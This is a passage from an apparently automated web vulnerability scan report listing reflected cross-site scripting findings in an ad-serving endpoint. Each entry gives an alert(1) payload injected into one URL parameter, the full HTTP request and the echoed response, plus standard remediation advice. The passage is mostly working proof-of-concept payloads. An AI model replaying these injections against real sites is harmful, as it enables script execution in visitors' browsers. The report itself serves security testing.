The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3334"-alert(1)-"8bb98f76d2b was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3c3334"-alert(1)-"8bb98f76d2b&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:06:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
1241976%3B2-0%3B0%3B55844876%3B4307-300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3c3334"-alert(1)-"8bb98f76d2b&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqd
...[SNIP]...

1.26. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4eed4"-alert(1)-"ce7690ba46a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=80244eed4"-alert(1)-"ce7690ba46a&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...

var url = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=80244eed4"-alert(1)-"ce7690ba46a&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppa
...[SNIP]...

1.27. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38d85"-alert(1)-"ea05c790aae was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.2038d85"-alert(1)-"ea05c790aae&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:13:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6914

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.2038d85"-alert(1)-"ea05c790aae&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
...[SNIP]...

1.28. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 350a3"-alert(1)-"017b84a1884 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5350a3"-alert(1)-"017b84a1884&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
click%3Bh%3Dv8/3a5a/17/16c/%2a/j%3B231242665%3B1-0%3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5350a3"-alert(1)-"017b84a1884&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0
...[SNIP]...

1.29. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8abfc"-alert(1)-"81641716a0d was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=200122538abfc"-alert(1)-"81641716a0d&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
%3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=200122538abfc"-alert(1)-"81641716a0d&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event
...[SNIP]...

1.30. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ce02"-alert(1)-"2612c838241 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=9ce02"-alert(1)-"2612c838241&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:12:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=9ce02"-alert(1)-"2612c838241&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fsc
...[SNIP]...

1.31. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [cpnmodule parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49e73"-alert(1)-"58a8d0f3679 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=49e73"-alert(1)-"58a8d0f3679&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=49e73"-alert(1)-"58a8d0f3679&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");

...[SNIP]...

1.32. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [e parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13e74"-alert(1)-"23471b4e672 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=313e74"-alert(1)-"23471b4e672&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
4900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=313e74"-alert(1)-"23471b4e672&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://
...[SNIP]...

1.33. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [epartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79d10"-alert(1)-"bac537ef45c was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=79d10"-alert(1)-"bac537ef45c&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
og.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=79d10"-alert(1)-"bac537ef45c&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na
...[SNIP]...

1.34. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [event parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload deb80"-alert(1)-"57c164cc6fa was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=deb80"-alert(1)-"57c164cc6fa HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6808
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 22 Nov 2010 00:13:24 GMT
Expires: Mon, 22 Nov 2010 00:13:24 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=deb80"-alert(1)-"57c164cc6fahttp://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg =
...[SNIP]...

1.35. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a34fd"-alert(1)-"bc95ae28570 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

